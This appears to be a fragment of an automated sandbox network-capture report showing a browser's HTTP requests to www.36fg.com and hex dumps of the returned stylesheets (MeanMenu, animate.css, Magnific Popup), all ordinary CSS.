                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:54 UTC986INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:54 GMT
                                                        Content-Type: text/css
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:30 GMT
                                                        vary: Accept-Encoding
                                                        etag: W/"60e7ae72-ddf"
                                                        expires: Sat, 15 Mar 2025 04:16:24 GMT
                                                        Cache-Control: max-age=43200
                                                        strict-transport-security: max-age=31536000
                                                        CF-Cache-Status: HIT
                                                        Age: 28896
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iyAeCBkveUAzOlhe3YAVeynQT9F9m5z6l%2Bm6z4GLUeXIAILqLkYD774JF0iQuduF%2FSYVO7HUxaorbo%2F2ygDyzKJAfD6pcxERS%2FqTEiIKs0MPLwYxMuGUP2wXT9v2BYM%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d49b18942369-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1979&rtt_var=746&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1192&delivery_rate=1462193&cwnd=132&unsent_bytes=0&cid=805baa60451ae01d&ts=149&x=0"
                                                        2025-03-15 00:17:54 UTC383INData Raw: 64 64 66 0d 0a ef bb bf 0d 0a 2f 2a 21 20 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 0d 0a 0d 0a 09 4d 65 61 6e 4d 65 6e 75 20 32 2e 30 2e 37 0d 0a 09 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 0d 0a 09 54 6f 20 62 65 20 75 73 65 64 20 77 69 74 68 20 6a 71 75 65 72 79 2e 6d 65 61 6e 6d 65 6e 75 2e 6a 73 20 62 79 20 43 68 72 69 73 20 57 68 61 72 74 6f 6e 20 28 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 65 61 6e 74 68 65 6d 65 73 2e 63 6f 6d 2f 70 6c 75 67 69 6e 73 2f 6d 65 61 6e 6d 65 6e 75 2f 29 0d 0a 0d 0a 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23
                                                        Data Ascii: ddf/*! #######################################################################MeanMenu 2.0.7--------To be used with jquery.meanmenu.js by Chris Wharton (http://www.meanthemes.com/plugins/meanmenu/)##################################
                                                        2025-03-15 00:17:54 UTC1369INData Raw: 6f 6e 65 3b 0d 0a 7d 0d 0a 0d 0a 2f 2a 20 77 68 65 6e 20 75 6e 64 65 72 20 76 69 65 77 70 6f 72 74 20 73 69 7a 65 2c 20 2e 6d 65 61 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 69 73 20 61 64 64 65 64 20 74 6f 20 62 6f 64 79 20 2a 2f 0d 0a 2e 6d 65 61 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 6d 65 61 6e 2d 62 61 72 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 29 20 6e 6f 6e 65 20 72 65 70 65 61 74 20 73 63 72 6f 6c 6c 20 30 20 30 3b 0d 0a 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0d 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 7a 2d 69 6e 64 65 78 3a 20 39 39 3b 0d 0a 7d 0d 0a 0d 0a 2e 6d 65 61 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 61
                                                        Data Ascii: one;}/* when under viewport size, .mean-container is added to body */.mean-container .mean-bar { background: rgba(0, 0, 0, 0) none repeat scroll 0 0; float: left; position: relative; width: 100%; z-index: 99;}.mean-container a
                                                        2025-03-15 00:17:54 UTC1369INData Raw: 72 20 2e 6d 65 61 6e 2d 6e 61 76 20 75 6c 20 6c 69 20 6c 69 20 61 20 7b 0d 0a 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 32 35 29 3b 0d 0a 20 20 6f 70 61 63 69 74 79 3a 20 30 2e 37 35 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 31 30 25 3b 0d 0a 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 76 69 73 69 62 6c 65 3b 0d 0a 20 20 77 69 64 74 68 3a 20 38 30 25 3b 0d 0a 7d 0d 0a 0d 0a 2e 6d 65 61 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 6d 65 61 6e 2d 6e 61 76 20 75 6c 20 6c 69 2e 6d 65 61 6e 2d 6c 61 73 74 20 61 20 7b 0d 0a 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0d 0a 09
                                                        Data Ascii: r .mean-nav ul li li a { border-top: 1px solid rgba(255, 255, 255, 0.25); opacity: 0.75; padding: 10px 10%; text-shadow: none; visibility: visible; width: 80%;}.mean-container .mean-nav ul li.mean-last a {border-bottom: none;
                                                        2025-03-15 00:17:54 UTC437INData Raw: 65 61 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 6d 65 61 6e 2d 70 75 73 68 20 7b 0d 0a 09 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0d 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0d 0a 7d 0d 0a 0d 0a 2e 6d 65 61 6e 2d 6e 61 76 20 2e 77 72 61 70 70 65 72 20 7b 0d 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 7d 0d 0a 0d 0a 2f 2a 20 46 69 78 20 66 6f 72 20 62 6f 78 20 73 69 7a 69 6e 67 20 6f 6e 20 46 6f 75 6e 64 61 74 69 6f 6e 20 46 72 61 6d 65 77 6f 72 6b 20 65 74 63 2e 20 2a 2f 0d 0a 2e 6d 65 61 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 6d 65 61 6e 2d 62 61 72 2c
                                                        Data Ascii: ean-container .mean-push {float: left;width: 100%;padding: 0;margin: 0;clear: both;}.mean-nav .wrapper {width: 100%;padding: 0;margin: 0;}/* Fix for box sizing on Foundation Framework etc. */.mean-container .mean-bar,
                                                        2025-03-15 00:17:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.549737104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:54 UTC623OUTGET /static/css/animate.min.css HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:54 UTC987INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:54 GMT
                                                        Content-Type: text/css
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:30 GMT
                                                        vary: Accept-Encoding
                                                        etag: W/"60e7ae72-112b7"
                                                        expires: Sat, 15 Mar 2025 03:39:31 GMT
                                                        Cache-Control: max-age=43200
                                                        strict-transport-security: max-age=31536000
                                                        CF-Cache-Status: HIT
                                                        Age: 31108
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O7gWX2F8kcZZTrSMQ6eVGHGA%2BUah4sBCnJzEeZFleQUxI5deDw1oehfTs%2BA4vOMstCCnrqxMRfAh2XD0Q9Dm%2BQ8lwTnHQorS68xCQEcTaHg0kI%2FE95j62yj817ReaMM%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d49b2a337611-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2423&min_rtt=2416&rtt_var=920&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1195&delivery_rate=1181229&cwnd=72&unsent_bytes=0&cid=1cedf480f02b5c18&ts=153&x=0"
                                                        2025-03-15 00:17:54 UTC382INData Raw: 37 63 39 61 0d 0a ef bb bf 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 0a 2f 2a 21 0a 20 2a 20 61 6e 69 6d 61 74 65 2e 63 73 73 20 2d 68 74 74 70 3a 2f 2f 64 61 6e 65 64 65 6e 2e 6d 65 2f 61 6e 69 6d 61 74 65 0a 20 2a 20 56 65 72 73 69 6f 6e 20 2d 20 33 2e 36 2e 30 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 38 20 44 61 6e 69 65 6c 20 45 64 65 6e 0a 20 2a 2f 0a 0a 20 2e 61 6e 69 6d 61 74 65 64 20 7b 0a 20 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 20
                                                        Data Ascii: 7c9a@charset "UTF-8";/*! * animate.css -http://daneden.me/animate * Version - 3.6.0 * Licensed under the MIT license - http://opensource.org/licenses/MIT * * Copyright (c) 2018 Daniel Eden */ .animated { -webkit-animation-duration: 1s;
                                                        2025-03-15 00:17:54 UTC1369INData Raw: 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 32 73 3b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 32 73 3b 0a 20 7d 0a 0a 20 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 62 6f 75 6e 63 65 20 7b 0a 20 20 20 30 25 2c 20 32 30 25 2c 20 35 30 25 2c 20 38 30 25 2c 20 31 30 30 25 20 7b 0a 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 0a 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 0a 20 20 20 7d 0a 0a 20 20 20 34 30 25 20 7b 0a 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 33 30 70 78 29 3b 0a 20 20 20 20 20 74 72 61 6e 73 66 6f 72
                                                        Data Ascii: -animation-duration: 2s; animation-duration: 2s; } @-webkit-keyframes bounce { 0%, 20%, 50%, 80%, 100% { -webkit-transform: translateY(0); transform: translateY(0); } 40% { -webkit-transform: translateY(-30px); transfor
                                                        2025-03-15 00:17:54 UTC1369INData Raw: 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 2e 31 29 3b 0a 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 2e 31 29 3b 0a 20 20 20 7d 0a 0a 20 20 20 31 30 30 25 20 7b 0a 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 20 7d 0a 20 7d 0a 0a 20 40 6b 65 79 66 72 61 6d 65 73 20 70 75 6c 73 65 20 7b 0a 20 20 20 30 25 20 7b 0a 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 20 20 20 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65
                                                        Data Ascii: ebkit-transform: scale(1.1); transform: scale(1.1); } 100% { -webkit-transform: scale(1); transform: scale(1); } } @keyframes pulse { 0% { -webkit-transform: scale(1); -ms-transform: scale(1); transform: scale
                                                        2025-03-15 00:17:54 UTC1369INData Raw: 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 73 68 61 6b 65 3b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 73 68 61 6b 65 3b 0a 20 7d 0a 0a 20 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 73 77 69 6e 67 20 7b 0a 20 20 20 32 30 25 20 7b 0a 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 31 35 64 65 67 29 3b 0a 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 31 35 64 65 67 29 3b 0a 20 20 20 7d 0a 0a 20 20 20 34 30 25 20 7b 0a 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 2d 31 30 64 65 67 29 3b 0a 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 2d 31 30 64 65 67 29 3b 0a 20 20 20 7d 0a 0a 20 20 20 36 30 25
                                                        Data Ascii: ation-name: shake; animation-name: shake; } @-webkit-keyframes swing { 20% { -webkit-transform: rotate(15deg); transform: rotate(15deg); } 40% { -webkit-transform: rotate(-10deg); transform: rotate(-10deg); } 60%
                                                        2025-03-15 00:17:54 UTC1369INData Raw: 73 63 61 6c 65 28 31 29 3b 0a 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 20 7d 0a 0a 20 20 20 31 30 25 2c 20 32 30 25 20 7b 0a 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 29 20 72 6f 74 61 74 65 28 2d 33 64 65 67 29 3b 0a 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 29 20 72 6f 74 61 74 65 28 2d 33 64 65 67 29 3b 0a 20 20 20 7d 0a 0a 20 20 20 33 30 25 2c 20 35 30 25 2c 20 37 30 25 2c 20 39 30 25 20 7b 0a 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 2e 31 29 20 72 6f 74 61 74 65 28 33 64 65 67 29 3b 0a 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 2e 31 29 20 72
                                                        Data Ascii: scale(1); transform: scale(1); } 10%, 20% { -webkit-transform: scale(0.9) rotate(-3deg); transform: scale(0.9) rotate(-3deg); } 30%, 50%, 70%, 90% { -webkit-transform: scale(1.1) rotate(3deg); transform: scale(1.1) r
                                                        2025-03-15 00:17:54 UTC1369INData Raw: 6e 69 63 6b 70 65 74 74 69 74 2f 67 6c 69 64 65 20 2a 2f 0a 0a 20 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 77 6f 62 62 6c 65 20 7b 0a 20 20 20 30 25 20 7b 0a 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 25 29 3b 0a 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 25 29 3b 0a 20 20 20 7d 0a 0a 20 20 20 31 35 25 20 7b 0a 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 2d 32 35 25 29 20 72 6f 74 61 74 65 28 2d 35 64 65 67 29 3b 0a 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 2d 32 35 25 29 20 72 6f 74 61 74 65 28 2d 35 64 65 67 29 3b 0a 20 20 20 7d 0a 0a
                                                        Data Ascii: nickpettit/glide */ @-webkit-keyframes wobble { 0% { -webkit-transform: translateX(0%); transform: translateX(0%); } 15% { -webkit-transform: translateX(-25%) rotate(-5deg); transform: translateX(-25%) rotate(-5deg); }
                                                        2025-03-15 00:17:54 UTC1369INData Raw: 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 2d 31 35 25 29 20 72 6f 74 61 74 65 28 2d 33 64 65 67 29 3b 0a 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 2d 31 35 25 29 20 72 6f 74 61 74 65 28 2d 33 64 65 67 29 3b 0a 20 20 20 7d 0a 0a 20 20 20 36 30 25 20 7b 0a 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 31 30 25 29 20 72 6f 74 61 74 65 28 32 64 65 67 29 3b 0a 20 20 20 20 20 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 31 30 25 29 20 72 6f 74 61 74 65 28 32 64 65 67 29 3b 0a 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 31 30 25 29 20 72 6f 74 61 74 65 28 32 64 65 67 29 3b 0a 20 20 20
                                                        Data Ascii: sform: translateX(-15%) rotate(-3deg); transform: translateX(-15%) rotate(-3deg); } 60% { -webkit-transform: translateX(10%) rotate(2deg); -ms-transform: translateX(10%) rotate(2deg); transform: translateX(10%) rotate(2deg);
                                                        2025-03-15 00:17:54 UTC1369INData Raw: 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 2e 39 29 3b 0a 20 20 20 7d 0a 0a 20 20 20 31 30 30 25 20 7b 0a 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 20 20 20 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 20 7d 0a 20 7d 0a 0a 20 2e 62 6f 75 6e 63 65 49 6e 20 7b 0a 20 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 62 6f 75 6e 63 65 49 6e 3b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 62 6f 75 6e 63 65 49 6e 3b 0a 20 7d 0a 0a 20 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 62 6f 75 6e 63 65 49 6e 44 6f 77 6e 20 7b 0a 20 20 20
                                                        Data Ascii: nsform: scale(.9); } 100% { -webkit-transform: scale(1); -ms-transform: scale(1); transform: scale(1); } } .bounceIn { -webkit-animation-name: bounceIn; animation-name: bounceIn; } @-webkit-keyframes bounceInDown {
                                                        2025-03-15 00:17:54 UTC1369INData Raw: 20 20 30 25 20 7b 0a 20 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0a 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 2d 32 30 30 30 70 78 29 3b 0a 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 2d 32 30 30 30 70 78 29 3b 0a 20 20 20 7d 0a 0a 20 20 20 36 30 25 20 7b 0a 20 20 20 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 33 30 70 78 29 3b 0a 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 33 30 70 78 29 3b 0a 20 20 20 7d 0a 0a 20 20 20 38 30 25 20 7b 0a 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72
                                                        Data Ascii: 0% { opacity: 0; -webkit-transform: translateX(-2000px); transform: translateX(-2000px); } 60% { opacity: 1; -webkit-transform: translateX(30px); transform: translateX(30px); } 80% { -webkit-transform: tr
                                                        2025-03-15 00:17:54 UTC1369INData Raw: 20 74 72 61 6e 73 6c 61 74 65 58 28 31 30 70 78 29 3b 0a 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 31 30 70 78 29 3b 0a 20 20 20 7d 0a 0a 20 20 20 31 30 30 25 20 7b 0a 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 0a 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 0a 20 20 20 7d 0a 20 7d 0a 0a 20 40 6b 65 79 66 72 61 6d 65 73 20 62 6f 75 6e 63 65 49 6e 52 69 67 68 74 20 7b 0a 20 20 20 30 25 20 7b 0a 20 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0a 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 32 30 30 30 70 78 29 3b 0a 20 20 20 20 20 2d 6d 73 2d 74
                                                        Data Ascii: translateX(10px); transform: translateX(10px); } 100% { -webkit-transform: translateX(0); transform: translateX(0); } } @keyframes bounceInRight { 0% { opacity: 0; -webkit-transform: translateX(2000px); -ms-t


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.549738104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:54 UTC626OUTGET /static/css/magnific-popup.css HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:54 UTC446INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:54 GMT
                                                        Content-Type: text/css
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Server: cloudflare
                                                        Last-Modified: Fri, 09 Jul 2021 02:03:30 GMT
                                                        Vary: Accept-Encoding
                                                        Etag: W/"60e7ae72-1b2a"
                                                        Expires: Sat, 15 Mar 2025 12:18:00 GMT
                                                        Cache-Control: max-age=43200
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cf-Cache-Status: REVALIDATED
                                                        CF-RAY: 9207d49b1a32c34b-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-15 00:17:54 UTC923INData Raw: 31 37 39 35 0d 0a ef bb bf 2f 2a 20 4d 61 67 6e 69 66 69 63 20 50 6f 70 75 70 20 43 53 53 20 2a 2f 0a 2e 6d 66 70 2d 62 67 20 7b 0a 20 20 74 6f 70 3a 20 30 3b 0a 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 7a 2d 69 6e 64 65 78 3a 20 31 30 34 32 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 62 30 62 30 62 3b 0a 20 20 6f 70 61 63 69 74 79 3a 20 30 2e 38 3b 20 7d 0a 0a 2e 6d 66 70 2d 77 72 61 70 20 7b 0a 20 20 74 6f 70 3a 20 30 3b 0a 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30
                                                        Data Ascii: 1795/* Magnific Popup CSS */.mfp-bg { top: 0; left: 0; width: 100%; height: 100%; z-index: 1042; overflow: hidden; position: fixed; background: #0b0b0b; opacity: 0.8; }.mfp-wrap { top: 0; left: 0; width: 100%; height: 100
                                                        2025-03-15 00:17:54 UTC1369INData Raw: 73 6f 72 3a 20 61 75 74 6f 3b 20 7d 0a 0a 2e 6d 66 70 2d 61 6a 61 78 2d 63 75 72 20 7b 0a 20 20 63 75 72 73 6f 72 3a 20 70 72 6f 67 72 65 73 73 3b 20 7d 0a 0a 2e 6d 66 70 2d 7a 6f 6f 6d 2d 6f 75 74 2d 63 75 72 2c 20 2e 6d 66 70 2d 7a 6f 6f 6d 2d 6f 75 74 2d 63 75 72 20 2e 6d 66 70 2d 69 6d 61 67 65 2d 68 6f 6c 64 65 72 20 2e 6d 66 70 2d 63 6c 6f 73 65 20 7b 0a 20 20 63 75 72 73 6f 72 3a 20 2d 6d 6f 7a 2d 7a 6f 6f 6d 2d 6f 75 74 3b 0a 20 20 63 75 72 73 6f 72 3a 20 2d 77 65 62 6b 69 74 2d 7a 6f 6f 6d 2d 6f 75 74 3b 0a 20 20 63 75 72 73 6f 72 3a 20 7a 6f 6f 6d 2d 6f 75 74 3b 20 7d 0a 0a 2e 6d 66 70 2d 7a 6f 6f 6d 20 7b 0a 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 63 75 72 73 6f 72 3a 20 2d 77 65 62 6b 69 74 2d 7a 6f 6f 6d 2d 69 6e 3b 0a
                                                        Data Ascii: sor: auto; }.mfp-ajax-cur { cursor: progress; }.mfp-zoom-out-cur, .mfp-zoom-out-cur .mfp-image-holder .mfp-close { cursor: -moz-zoom-out; cursor: -webkit-zoom-out; cursor: zoom-out; }.mfp-zoom { cursor: pointer; cursor: -webkit-zoom-in;
